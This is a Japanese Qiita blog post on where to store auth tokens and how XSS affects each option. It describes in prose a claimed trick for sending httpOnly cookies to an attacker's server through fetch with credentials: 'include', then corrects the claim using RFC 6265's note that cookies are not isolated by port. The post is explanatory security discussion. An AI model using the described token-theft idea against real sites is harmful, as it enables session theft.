Help us understand the problem. What is going on with this article?

Auth TokenをlocalStorageに入れようが、cookieに入れようがどっちもXSS危険性には無防備(同ドメイン内なら ...)

greta-farnedi-HAcS36pCiM0-unsplash.jpg

tokenを保存する場所

  • localStorage
  • cookie
  • cookie (http only)
  • メモリ内 (変数)

よく言われるのが JWT tokenをlocalStorageに入れるべきではない ということ。
理由としてはJavascriptで簡単に読めてしまうので、XSSがあった場合意図しないスクリプトを動かされてしまい、結果としてtokenが盗まれるというもの。
対応策として cookie (http only) を色んな所で推奨してる。

が、cookie (http only)も実は無意味

localStorage vs Cookies for Auth Token Storage - Why httpOnly Cookies are NOT better!
https://www.youtube.com/watch?v=mBd-SMPp3kI

XSSがある場合、とにかくスクリプトを動かされてしまう。「だけど、cookie (http only)はスクリプトから読めないから問題ないじゃないか!」と思うが、攻撃者が自身のサーバーを作って、fetchcredentials: "include" をしてしまえば、http only cookieを含めた全部を攻撃者のサーバーに送れちゃうよ、という話。

が、同ドメインな場合のみである

コメント参照

https://tools.ietf.org/html/rfc6265#section-8.5

Cookies do not provide isolation by port. If a cookie is readable by
a service running on one port, the cookie is also readable by a
service running on another port of the same server. If a cookie is
writable by a service on one port, the cookie is also writable by a
service running on another port of the same server. For this reason,
servers SHOULD NOT both run mutually distrusting services on
different ports of the same host and use cookies to store security-
sensitive information.

今回このyoutubeではlocalhostドメイン内で30008000ポートを使っていたので、すべてのcookieがcredentials: "include"でダダ漏れっぽく見えていた。

これをa.domainからb.domainへのcredentials: "include"であった場合は、a.domainのcookieはb.domainへ漏れない。

youtubeの投稿も現状unlisted状態になって、検索では出てきません。
localStorage_vs_Cookies_for_Auth_Token_Storage_-_Why_httpOnly_Cookies_are_NOT_better__-_YouTube-3.png

Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
Comments
No comments
Sign up for free and join this conversation.
If you already have a Qiita account
Why do not you register as a user and use Qiita more conveniently?
You need to log in to use this function. Qiita can be used more conveniently after logging in.
You seem to be reading articles frequently this month. Qiita can be used more conveniently after logging in.
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
ユーザーは見つかりませんでした